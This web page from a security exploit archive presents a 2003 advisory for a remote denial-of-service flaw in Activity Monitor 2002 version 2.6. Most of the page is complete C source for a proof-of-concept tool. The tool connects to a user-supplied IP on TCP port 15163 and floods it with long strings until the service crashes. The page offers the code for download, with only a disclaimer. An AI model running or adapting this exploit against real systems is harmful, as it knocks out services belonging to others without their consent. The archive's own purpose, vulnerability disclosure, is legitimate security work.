logo Home

Untitled Document

Home > Archives Exploits > Exploits


Untitled Document



Activity Monitor 2002 remote Denial of Service exploit
Date: 2003-05-30

Author : Luca Ercoli <luca.ercoli@inwind.it>
Download : http://www.security-corporation.com/assets/security/download/exploit/actmonitor2002.c

Overview: "Activity Monitor 2002 is a monitoring software system for real
time employee monitoring and continuous tracking of users activities on
networked computers."
More information can be found at www.softactivity.com


Vulnerability Description: By connecting TCP port 15163 and sending a long
string, a remote attacker could cause the application to crash
and exhaust CPU resources.


Affected Software: Activity Monitor 2002 ver. 2.6

Exploit:

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>

int main(int argc, char **argv)
{

int i,ck,port,sd;
char dos[10000];

struct sockaddr_in act_mon_server;

if(argc < 2)
{
printf("\nUsage: %s <ip>\n", argv[0]);
exit(0);
}

port = 15163;

for(i = 0; i < 10000; i++) dos[i] = 'x';

act_mon_server.sin_family = AF_INET;
act_mon_server.sin_port = htons((u_short)port);
act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);

sd = socket(AF_INET, SOCK_STREAM, 0);

ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
(act_mon_server));

if(ck != 0) {
perror("Connect");
exit(0);
}

printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
printf("\t\tby Luca Ercoli luca.ercoli@inwind.it\n\n");

write(sd, dos, sizeof(dos));
write(sd, dos, sizeof(dos));
write(sd, dos, sizeof(dos));

printf("\nDoS sent!\n");

close(sd);

exit(0);
}





Any use of these codes are at the user's own responsibility.

 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy